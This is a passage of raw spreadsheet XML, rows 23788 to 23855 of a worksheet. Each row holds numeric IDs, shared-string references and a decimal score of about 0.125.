        <v>22933</v>
      </c>
      <c r="D23788" s="2">
        <v>1.0</v>
      </c>
      <c r="E23788" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23788" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="23789" ht="15.75" customHeight="1">
      <c r="A23789" s="1">
        <v>13688.0</v>
      </c>
      <c r="B23789" s="2">
        <v>3.6094038E7</v>
      </c>
      <c r="C23789" s="2" t="s">
        <v>22934</v>
      </c>
      <c r="D23789" s="2">
        <v>1.0</v>
      </c>
      <c r="E23789" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23789" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="23790" ht="15.75" customHeight="1">
      <c r="A23790" s="1">
        <v>14382.0</v>
      </c>
      <c r="B23790" s="2">
        <v>3902207.0</v>
      </c>
      <c r="C23790" s="2" t="s">
        <v>22935</v>
      </c>
      <c r="D23790" s="2">
        <v>1.0</v>
      </c>
      <c r="E23790" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23790" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="23791" ht="15.75" customHeight="1">
      <c r="A23791" s="1">
        <v>16185.0</v>
      </c>
      <c r="B23791" s="2">
        <v>4.5656941E7</v>
      </c>
      <c r="C23791" s="2" t="s">
        <v>22936</v>
      </c>
      <c r="D23791" s="2">
        <v>1.0</v>
      </c>
      <c r="E23791" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23791" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="23792" ht="15.75" customHeight="1">
      <c r="A23792" s="1">
        <v>20581.0</v>
      </c>
      <c r="B23792" s="2">
        <v>1.3699888E7</v>
      </c>
      <c r="C23792" s="2" t="s">
        <v>22937</v>
      </c>
      <c r="D23792" s="2">
        <v>1.0</v>
      </c>
      <c r="E23792" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23792" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="23793" ht="15.75" customHeight="1">
      <c r="A23793" s="1">
        <v>20927.0</v>
      </c>
      <c r="B23793" s="2">
        <v>1.6416937E7</v>
      </c>
      <c r="C23793" s="2" t="s">
        <v>22938</v>
      </c>
      <c r="D23793" s="2">
        <v>1.0</v>
      </c>
      <c r="E23793" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23793" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="23794" ht="15.75" customHeight="1">
      <c r="A23794" s="1">
        <v>21021.0</v>
      </c>
      <c r="B23794" s="2">
        <v>1.742027E7</v>
      </c>
      <c r="C23794" s="2" t="s">
        <v>22939</v>
      </c>
      <c r="D23794" s="2">
        <v>1.0</v>
      </c>
      <c r="E23794" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23794" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="23795" ht="15.75" customHeight="1">
      <c r="A23795" s="1">
        <v>25393.0</v>
      </c>
      <c r="B23795" s="2">
        <v>1.3699887E7</v>
      </c>
      <c r="C23795" s="2" t="s">
        <v>22937</v>
      </c>
      <c r="D23795" s="2">
        <v>1.0</v>
      </c>
      <c r="E23795" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23795" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="23796" ht="15.75" customHeight="1">
      <c r="A23796" s="1">
        <v>26472.0</v>
      </c>
      <c r="B23796" s="2">
        <v>1.7420269E7</v>
      </c>
      <c r="C23796" s="2" t="s">
        <v>22939</v>
      </c>
      <c r="D23796" s="2">
        <v>1.0</v>
      </c>
      <c r="E23796" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23796" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="23797" ht="15.75" customHeight="1">
      <c r="A23797" s="1">
        <v>31080.0</v>
      </c>
      <c r="B23797" s="2">
        <v>4.8330947E7</v>
      </c>
      <c r="C23797" s="2" t="s">
        <v>22940</v>
      </c>
      <c r="D23797" s="2">
        <v>1.0</v>
      </c>
      <c r="E23797" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23797" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="23798" ht="15.75" customHeight="1">
      <c r="A23798" s="1">
        <v>32096.0</v>
      </c>
      <c r="B23798" s="2">
        <v>5399868.0</v>
      </c>
      <c r="C23798" s="2" t="s">
        <v>22941</v>
      </c>
      <c r="D23798" s="2">
        <v>1.0</v>
      </c>
      <c r="E23798" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23798" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="23799" ht="15.75" customHeight="1">
      <c r="A23799" s="1">
        <v>32228.0</v>
      </c>
      <c r="B23799" s="2">
        <v>5.4941345E7</v>
      </c>
      <c r="C23799" s="2" t="s">
        <v>22942</v>
      </c>
      <c r="D23799" s="2">
        <v>1.0</v>
      </c>
      <c r="E23799" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23799" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="23800" ht="15.75" customHeight="1">
      <c r="A23800" s="1">
        <v>33870.0</v>
      </c>
      <c r="B23800" s="2">
        <v>9095951.0</v>
      </c>
      <c r="C23800" s="2" t="s">
        <v>22943</v>
      </c>
      <c r="D23800" s="2">
        <v>1.0</v>
      </c>
      <c r="E23800" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23800" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="23801" ht="15.75" customHeight="1">
      <c r="A23801" s="1">
        <v>34078.0</v>
      </c>
      <c r="B23801" s="2">
        <v>9666044.0</v>
      </c>
      <c r="C23801" s="2" t="s">
        <v>22944</v>
      </c>
      <c r="D23801" s="2">
        <v>1.0</v>
      </c>
      <c r="E23801" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23801" s="2">
        <v>0.1259920634920635</v>
      </c>
    </row>
    <row r="23802" ht="15.75" customHeight="1">
      <c r="A23802" s="1">
        <v>1600.0</v>
      </c>
      <c r="B23802" s="2">
        <v>2.7788626E7</v>
      </c>
      <c r="C23802" s="2" t="s">
        <v>22945</v>
      </c>
      <c r="D23802" s="2">
        <v>1.0</v>
      </c>
      <c r="E23802" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23802" s="2">
        <v>0.1258680555555556</v>
      </c>
    </row>
    <row r="23803" ht="15.75" customHeight="1">
      <c r="A23803" s="1">
        <v>619.0</v>
      </c>
      <c r="B23803" s="2">
        <v>1.9509238E7</v>
      </c>
      <c r="C23803" s="2" t="s">
        <v>22946</v>
      </c>
      <c r="D23803" s="2">
        <v>1.0</v>
      </c>
      <c r="E23803" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23803" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23804" ht="15.75" customHeight="1">
      <c r="A23804" s="1">
        <v>1921.0</v>
      </c>
      <c r="B23804" s="2">
        <v>3.0073141E7</v>
      </c>
      <c r="C23804" s="2" t="s">
        <v>22947</v>
      </c>
      <c r="D23804" s="2">
        <v>1.0</v>
      </c>
      <c r="E23804" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23804" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23805" ht="15.75" customHeight="1">
      <c r="A23805" s="1">
        <v>6654.0</v>
      </c>
      <c r="B23805" s="2">
        <v>4.9092068E7</v>
      </c>
      <c r="C23805" s="2" t="s">
        <v>22948</v>
      </c>
      <c r="D23805" s="2">
        <v>1.0</v>
      </c>
      <c r="E23805" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23805" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23806" ht="15.75" customHeight="1">
      <c r="A23806" s="1">
        <v>7735.0</v>
      </c>
      <c r="B23806" s="2">
        <v>5.2047573E7</v>
      </c>
      <c r="C23806" s="2" t="s">
        <v>22949</v>
      </c>
      <c r="D23806" s="2">
        <v>1.0</v>
      </c>
      <c r="E23806" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23806" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23807" ht="15.75" customHeight="1">
      <c r="A23807" s="1">
        <v>12934.0</v>
      </c>
      <c r="B23807" s="2">
        <v>3.2356888E7</v>
      </c>
      <c r="C23807" s="2" t="s">
        <v>22950</v>
      </c>
      <c r="D23807" s="2">
        <v>1.0</v>
      </c>
      <c r="E23807" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23807" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23808" ht="15.75" customHeight="1">
      <c r="A23808" s="1">
        <v>13314.0</v>
      </c>
      <c r="B23808" s="2">
        <v>3.456052E7</v>
      </c>
      <c r="C23808" s="2" t="s">
        <v>22951</v>
      </c>
      <c r="D23808" s="2">
        <v>1.0</v>
      </c>
      <c r="E23808" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23808" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23809" ht="15.75" customHeight="1">
      <c r="A23809" s="1">
        <v>14052.0</v>
      </c>
      <c r="B23809" s="2">
        <v>3.7530513E7</v>
      </c>
      <c r="C23809" s="2" t="s">
        <v>22952</v>
      </c>
      <c r="D23809" s="2">
        <v>1.0</v>
      </c>
      <c r="E23809" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23809" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23810" ht="15.75" customHeight="1">
      <c r="A23810" s="1">
        <v>14404.0</v>
      </c>
      <c r="B23810" s="2">
        <v>3.9185848E7</v>
      </c>
      <c r="C23810" s="2" t="s">
        <v>22953</v>
      </c>
      <c r="D23810" s="2">
        <v>1.0</v>
      </c>
      <c r="E23810" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23810" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23811" ht="15.75" customHeight="1">
      <c r="A23811" s="1">
        <v>19274.0</v>
      </c>
      <c r="B23811" s="2">
        <v>5.5161602E7</v>
      </c>
      <c r="C23811" s="2" t="s">
        <v>22954</v>
      </c>
      <c r="D23811" s="2">
        <v>1.0</v>
      </c>
      <c r="E23811" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23811" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23812" ht="15.75" customHeight="1">
      <c r="A23812" s="1">
        <v>20349.0</v>
      </c>
      <c r="B23812" s="2">
        <v>1.1630586E7</v>
      </c>
      <c r="C23812" s="2" t="s">
        <v>22955</v>
      </c>
      <c r="D23812" s="2">
        <v>1.0</v>
      </c>
      <c r="E23812" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23812" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23813" ht="15.75" customHeight="1">
      <c r="A23813" s="1">
        <v>20368.0</v>
      </c>
      <c r="B23813" s="2">
        <v>1.18042E7</v>
      </c>
      <c r="C23813" s="2" t="s">
        <v>22956</v>
      </c>
      <c r="D23813" s="2">
        <v>1.0</v>
      </c>
      <c r="E23813" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23813" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23814" ht="15.75" customHeight="1">
      <c r="A23814" s="1">
        <v>20775.0</v>
      </c>
      <c r="B23814" s="2">
        <v>1.4980605E7</v>
      </c>
      <c r="C23814" s="2" t="s">
        <v>22957</v>
      </c>
      <c r="D23814" s="2">
        <v>1.0</v>
      </c>
      <c r="E23814" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23814" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23815" ht="15.75" customHeight="1">
      <c r="A23815" s="1">
        <v>21131.0</v>
      </c>
      <c r="B23815" s="2">
        <v>1.8397297E7</v>
      </c>
      <c r="C23815" s="2" t="s">
        <v>22958</v>
      </c>
      <c r="D23815" s="2">
        <v>1.0</v>
      </c>
      <c r="E23815" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23815" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23816" ht="15.75" customHeight="1">
      <c r="A23816" s="1">
        <v>21550.0</v>
      </c>
      <c r="B23816" s="2">
        <v>2.3590074E7</v>
      </c>
      <c r="C23816" s="2" t="s">
        <v>22959</v>
      </c>
      <c r="D23816" s="2">
        <v>1.0</v>
      </c>
      <c r="E23816" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23816" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23817" ht="15.75" customHeight="1">
      <c r="A23817" s="1">
        <v>22524.0</v>
      </c>
      <c r="B23817" s="2">
        <v>3.7707341E7</v>
      </c>
      <c r="C23817" s="2" t="s">
        <v>22960</v>
      </c>
      <c r="D23817" s="2">
        <v>1.0</v>
      </c>
      <c r="E23817" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23817" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23818" ht="15.75" customHeight="1">
      <c r="A23818" s="1">
        <v>22771.0</v>
      </c>
      <c r="B23818" s="2">
        <v>4.496563E7</v>
      </c>
      <c r="C23818" s="2" t="s">
        <v>22961</v>
      </c>
      <c r="D23818" s="2">
        <v>1.0</v>
      </c>
      <c r="E23818" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23818" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23819" ht="15.75" customHeight="1">
      <c r="A23819" s="1">
        <v>23868.0</v>
      </c>
      <c r="B23819" s="2">
        <v>8340461.0</v>
      </c>
      <c r="C23819" s="2" t="s">
        <v>22962</v>
      </c>
      <c r="D23819" s="2">
        <v>1.0</v>
      </c>
      <c r="E23819" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23819" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23820" ht="15.75" customHeight="1">
      <c r="A23820" s="1">
        <v>23902.0</v>
      </c>
      <c r="B23820" s="2">
        <v>8481214.0</v>
      </c>
      <c r="C23820" s="2" t="s">
        <v>22963</v>
      </c>
      <c r="D23820" s="2">
        <v>1.0</v>
      </c>
      <c r="E23820" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23820" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23821" ht="15.75" customHeight="1">
      <c r="A23821" s="1">
        <v>24743.0</v>
      </c>
      <c r="B23821" s="2">
        <v>1.1804199E7</v>
      </c>
      <c r="C23821" s="2" t="s">
        <v>22956</v>
      </c>
      <c r="D23821" s="2">
        <v>1.0</v>
      </c>
      <c r="E23821" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23821" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23822" ht="15.75" customHeight="1">
      <c r="A23822" s="1">
        <v>24863.0</v>
      </c>
      <c r="B23822" s="2">
        <v>1.2208325E7</v>
      </c>
      <c r="C23822" s="2" t="s">
        <v>22964</v>
      </c>
      <c r="D23822" s="2">
        <v>1.0</v>
      </c>
      <c r="E23822" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23822" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23823" ht="15.75" customHeight="1">
      <c r="A23823" s="1">
        <v>25116.0</v>
      </c>
      <c r="B23823" s="2">
        <v>1.2970363E7</v>
      </c>
      <c r="C23823" s="2" t="s">
        <v>22965</v>
      </c>
      <c r="D23823" s="2">
        <v>1.0</v>
      </c>
      <c r="E23823" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23823" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23824" ht="15.75" customHeight="1">
      <c r="A23824" s="1">
        <v>26008.0</v>
      </c>
      <c r="B23824" s="2">
        <v>1.5339366E7</v>
      </c>
      <c r="C23824" s="2" t="s">
        <v>22966</v>
      </c>
      <c r="D23824" s="2">
        <v>1.0</v>
      </c>
      <c r="E23824" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23824" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23825" ht="15.75" customHeight="1">
      <c r="A23825" s="1">
        <v>26024.0</v>
      </c>
      <c r="B23825" s="2">
        <v>1.5386361E7</v>
      </c>
      <c r="C23825" s="2" t="s">
        <v>22967</v>
      </c>
      <c r="D23825" s="2">
        <v>1.0</v>
      </c>
      <c r="E23825" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23825" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23826" ht="15.75" customHeight="1">
      <c r="A23826" s="1">
        <v>27066.0</v>
      </c>
      <c r="B23826" s="2">
        <v>2.0378125E7</v>
      </c>
      <c r="C23826" s="2" t="s">
        <v>22968</v>
      </c>
      <c r="D23826" s="2">
        <v>1.0</v>
      </c>
      <c r="E23826" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23826" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23827" ht="15.75" customHeight="1">
      <c r="A23827" s="1">
        <v>27428.0</v>
      </c>
      <c r="B23827" s="2">
        <v>2.190946E7</v>
      </c>
      <c r="C23827" s="2" t="s">
        <v>22969</v>
      </c>
      <c r="D23827" s="2">
        <v>1.0</v>
      </c>
      <c r="E23827" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23827" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23828" ht="15.75" customHeight="1">
      <c r="A23828" s="1">
        <v>27637.0</v>
      </c>
      <c r="B23828" s="2">
        <v>2.2739466E7</v>
      </c>
      <c r="C23828" s="2" t="s">
        <v>22970</v>
      </c>
      <c r="D23828" s="2">
        <v>1.0</v>
      </c>
      <c r="E23828" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23828" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23829" ht="15.75" customHeight="1">
      <c r="A23829" s="1">
        <v>27885.0</v>
      </c>
      <c r="B23829" s="2">
        <v>2.3590073E7</v>
      </c>
      <c r="C23829" s="2" t="s">
        <v>22959</v>
      </c>
      <c r="D23829" s="2">
        <v>1.0</v>
      </c>
      <c r="E23829" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23829" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23830" ht="15.75" customHeight="1">
      <c r="A23830" s="1">
        <v>29475.0</v>
      </c>
      <c r="B23830" s="2">
        <v>3.2382393E7</v>
      </c>
      <c r="C23830" s="2" t="s">
        <v>22971</v>
      </c>
      <c r="D23830" s="2">
        <v>1.0</v>
      </c>
      <c r="E23830" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23830" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23831" ht="15.75" customHeight="1">
      <c r="A23831" s="1">
        <v>29633.0</v>
      </c>
      <c r="B23831" s="2">
        <v>3.375663E7</v>
      </c>
      <c r="C23831" s="2" t="s">
        <v>22972</v>
      </c>
      <c r="D23831" s="2">
        <v>1.0</v>
      </c>
      <c r="E23831" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23831" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23832" ht="15.75" customHeight="1">
      <c r="A23832" s="1">
        <v>30943.0</v>
      </c>
      <c r="B23832" s="2">
        <v>4.7313137E7</v>
      </c>
      <c r="C23832" s="2" t="s">
        <v>22973</v>
      </c>
      <c r="D23832" s="2">
        <v>1.0</v>
      </c>
      <c r="E23832" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23832" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23833" ht="15.75" customHeight="1">
      <c r="A23833" s="1">
        <v>32183.0</v>
      </c>
      <c r="B23833" s="2">
        <v>5.4664066E7</v>
      </c>
      <c r="C23833" s="2" t="s">
        <v>22974</v>
      </c>
      <c r="D23833" s="2">
        <v>1.0</v>
      </c>
      <c r="E23833" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23833" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23834" ht="15.75" customHeight="1">
      <c r="A23834" s="1">
        <v>32336.0</v>
      </c>
      <c r="B23834" s="2">
        <v>5.5876801E7</v>
      </c>
      <c r="C23834" s="2" t="s">
        <v>22975</v>
      </c>
      <c r="D23834" s="2">
        <v>1.0</v>
      </c>
      <c r="E23834" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23834" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23835" ht="15.75" customHeight="1">
      <c r="A23835" s="1">
        <v>33057.0</v>
      </c>
      <c r="B23835" s="2">
        <v>6812015.0</v>
      </c>
      <c r="C23835" s="2" t="s">
        <v>22976</v>
      </c>
      <c r="D23835" s="2">
        <v>1.0</v>
      </c>
      <c r="E23835" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23835" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23836" ht="15.75" customHeight="1">
      <c r="A23836" s="1">
        <v>33313.0</v>
      </c>
      <c r="B23836" s="2">
        <v>7517463.0</v>
      </c>
      <c r="C23836" s="2" t="s">
        <v>22977</v>
      </c>
      <c r="D23836" s="2">
        <v>1.0</v>
      </c>
      <c r="E23836" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23836" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23837" ht="15.75" customHeight="1">
      <c r="A23837" s="1">
        <v>33618.0</v>
      </c>
      <c r="B23837" s="2">
        <v>8343568.0</v>
      </c>
      <c r="C23837" s="2" t="s">
        <v>22978</v>
      </c>
      <c r="D23837" s="2">
        <v>1.0</v>
      </c>
      <c r="E23837" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23837" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23838" ht="15.75" customHeight="1">
      <c r="A23838" s="1">
        <v>33705.0</v>
      </c>
      <c r="B23838" s="2">
        <v>8481213.0</v>
      </c>
      <c r="C23838" s="2" t="s">
        <v>22963</v>
      </c>
      <c r="D23838" s="2">
        <v>1.0</v>
      </c>
      <c r="E23838" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23838" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23839" ht="15.75" customHeight="1">
      <c r="A23839" s="1">
        <v>33970.0</v>
      </c>
      <c r="B23839" s="2">
        <v>9382887.0</v>
      </c>
      <c r="C23839" s="2" t="s">
        <v>22979</v>
      </c>
      <c r="D23839" s="2">
        <v>1.0</v>
      </c>
      <c r="E23839" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23839" s="2">
        <v>0.1257309941520468</v>
      </c>
    </row>
    <row r="23840" ht="15.75" customHeight="1">
      <c r="A23840" s="1">
        <v>24130.0</v>
      </c>
      <c r="B23840" s="2">
        <v>1.0032901E7</v>
      </c>
      <c r="C23840" s="2" t="s">
        <v>22980</v>
      </c>
      <c r="D23840" s="2">
        <v>1.0</v>
      </c>
      <c r="E23840" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23840" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="23841" ht="15.75" customHeight="1">
      <c r="A23841" s="1">
        <v>24376.0</v>
      </c>
      <c r="B23841" s="2">
        <v>1.076627E7</v>
      </c>
      <c r="C23841" s="2" t="s">
        <v>22981</v>
      </c>
      <c r="D23841" s="2">
        <v>1.0</v>
      </c>
      <c r="E23841" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23841" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="23842" ht="15.75" customHeight="1">
      <c r="A23842" s="1">
        <v>25334.0</v>
      </c>
      <c r="B23842" s="2">
        <v>1.3489839E7</v>
      </c>
      <c r="C23842" s="2" t="s">
        <v>777</v>
      </c>
      <c r="D23842" s="2">
        <v>1.0</v>
      </c>
      <c r="E23842" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23842" s="2">
        <v>0.1256410256410257</v>
      </c>
    </row>
    <row r="23843" ht="15.75" customHeight="1">
      <c r="A23843" s="1">
        <v>23909.0</v>
      </c>
      <c r="B23843" s="2">
        <v>8509274.0</v>
      </c>
      <c r="C23843" s="2" t="s">
        <v>22982</v>
      </c>
      <c r="D23843" s="2">
        <v>1.0</v>
      </c>
      <c r="E23843" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23843" s="2">
        <v>0.1254789272030652</v>
      </c>
    </row>
    <row r="23844" ht="15.75" customHeight="1">
      <c r="A23844" s="1">
        <v>33714.0</v>
      </c>
      <c r="B23844" s="2">
        <v>8509273.0</v>
      </c>
      <c r="C23844" s="2" t="s">
        <v>22983</v>
      </c>
      <c r="D23844" s="2">
        <v>1.0</v>
      </c>
      <c r="E23844" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23844" s="2">
        <v>0.1254789272030652</v>
      </c>
    </row>
    <row r="23845" ht="15.75" customHeight="1">
      <c r="A23845" s="1">
        <v>24895.0</v>
      </c>
      <c r="B23845" s="2">
        <v>1.2276503E7</v>
      </c>
      <c r="C23845" s="2" t="s">
        <v>22984</v>
      </c>
      <c r="D23845" s="2">
        <v>1.0</v>
      </c>
      <c r="E23845" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23845" s="2">
        <v>0.1254789272030651</v>
      </c>
    </row>
    <row r="23846" ht="15.75" customHeight="1">
      <c r="A23846" s="1">
        <v>2403.0</v>
      </c>
      <c r="B23846" s="2">
        <v>3.3428868E7</v>
      </c>
      <c r="C23846" s="2" t="s">
        <v>22985</v>
      </c>
      <c r="D23846" s="2">
        <v>1.0</v>
      </c>
      <c r="E23846" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23846" s="2">
        <v>0.1254208754208755</v>
      </c>
    </row>
    <row r="23847" ht="15.75" customHeight="1">
      <c r="A23847" s="1">
        <v>33621.0</v>
      </c>
      <c r="B23847" s="2">
        <v>8349498.0</v>
      </c>
      <c r="C23847" s="2" t="s">
        <v>22986</v>
      </c>
      <c r="D23847" s="2">
        <v>1.0</v>
      </c>
      <c r="E23847" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23847" s="2">
        <v>0.1254208754208755</v>
      </c>
    </row>
    <row r="23848" ht="15.75" customHeight="1">
      <c r="A23848" s="1">
        <v>27527.0</v>
      </c>
      <c r="B23848" s="2">
        <v>2.2189247E7</v>
      </c>
      <c r="C23848" s="2" t="s">
        <v>22987</v>
      </c>
      <c r="D23848" s="2">
        <v>1.0</v>
      </c>
      <c r="E23848" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23848" s="2">
        <v>0.1254208754208754</v>
      </c>
    </row>
    <row r="23849" ht="15.75" customHeight="1">
      <c r="A23849" s="1">
        <v>28790.0</v>
      </c>
      <c r="B23849" s="2">
        <v>2.8528827E7</v>
      </c>
      <c r="C23849" s="2" t="s">
        <v>22988</v>
      </c>
      <c r="D23849" s="2">
        <v>1.0</v>
      </c>
      <c r="E23849" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23849" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="23850" ht="15.75" customHeight="1">
      <c r="A23850" s="1">
        <v>30391.0</v>
      </c>
      <c r="B23850" s="2">
        <v>3.8615206E7</v>
      </c>
      <c r="C23850" s="2" t="s">
        <v>22989</v>
      </c>
      <c r="D23850" s="2">
        <v>1.0</v>
      </c>
      <c r="E23850" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23850" s="2">
        <v>0.1252354048964218</v>
      </c>
    </row>
    <row r="23851" ht="15.75" customHeight="1">
      <c r="A23851" s="1">
        <v>30489.0</v>
      </c>
      <c r="B23851" s="2">
        <v>3993072.0</v>
      </c>
      <c r="C23851" s="2" t="s">
        <v>22990</v>
      </c>
      <c r="D23851" s="2">
        <v>1.0</v>
      </c>
      <c r="E23851" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23851" s="2">
        <v>0.1252072968490879</v>
      </c>
    </row>
    <row r="23852" ht="15.75" customHeight="1">
      <c r="A23852" s="1">
        <v>30365.0</v>
      </c>
      <c r="B23852" s="2">
        <v>3.8367645E7</v>
      </c>
      <c r="C23852" s="2" t="s">
        <v>22991</v>
      </c>
      <c r="D23852" s="2">
        <v>1.0</v>
      </c>
      <c r="E23852" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23852" s="2">
        <v>0.1250000000000001</v>
      </c>
    </row>
    <row r="23853" ht="15.75" customHeight="1">
      <c r="A23853" s="1">
        <v>7623.0</v>
      </c>
      <c r="B23853" s="2">
        <v>5.1737436E7</v>
      </c>
      <c r="C23853" s="2" t="s">
        <v>22992</v>
      </c>
      <c r="D23853" s="2">
        <v>1.0</v>
      </c>
      <c r="E23853" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23853" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="23854" ht="15.75" customHeight="1">
      <c r="A23854" s="1">
        <v>16856.0</v>
      </c>
      <c r="B23854" s="2">
        <v>4.791953E7</v>
      </c>
      <c r="C23854" s="2" t="s">
        <v>22993</v>
      </c>
      <c r="D23854" s="2">
        <v>1.0</v>
      </c>
      <c r="E23854" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23854" s="2">
        <v>0.125</v>
      </c>
    </row>
    <row r="23855" ht="15.75" customHeight="1">
      <c r="A23855" s="1">
        <v>22818.0</v>
      </c>
      <c r="B23855" s="2">
        <v>4.6187271E7</v>
      </c>
      <c r="C23855" s="2" t="s">
        <v>22914</v>
      </c>
      <c r="D23855" s="2">
        <v>1.0</v>
